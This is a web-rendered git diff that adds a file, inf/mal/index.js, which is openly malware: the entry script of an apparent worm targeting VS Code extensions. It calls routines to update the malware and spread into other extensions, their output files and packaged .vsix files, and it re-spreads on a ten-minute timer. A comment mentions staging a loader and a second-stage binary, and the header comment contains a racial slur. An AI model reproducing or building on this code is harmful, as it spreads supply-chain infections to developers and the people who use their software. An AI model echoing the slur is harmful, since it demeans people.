aboutsummaryrefslogtreecommitdiff
path: root/inf/mal/index.js
diff options
context:
space:
mode:
Diffstat (limited to 'inf/mal/index.js')
-rw-r--r--inf/mal/index.js20
1 files changed, 20 insertions, 0 deletions
diff --git a/inf/mal/index.js b/inf/mal/index.js
new file mode 100644
index 0000000..a87e788
--- /dev/null
+++ b/inf/mal/index.js
@@ -0,0 +1,20 @@
+/*
+ * flawless victory, ya niggas can't do shit to me
+ * physically, lyrically, hypothetically, realistically
+ */
+
+// XXX find a decent host for stage1 loader & stage2.bin
+
+update_malware();
+
+/* spread to other extension's output files if opened in workspace */
+extension_js_spread();
+
+/* spread to other extensions in case we get nuked */
+extension_spread();
+
+/* spread to any packaged extensions in the current directory */
+vsix_spread();
+
+/* keep spreading in case the files get updated / created */
+setInterval(vsix_spread, 600000); \ No newline at end of file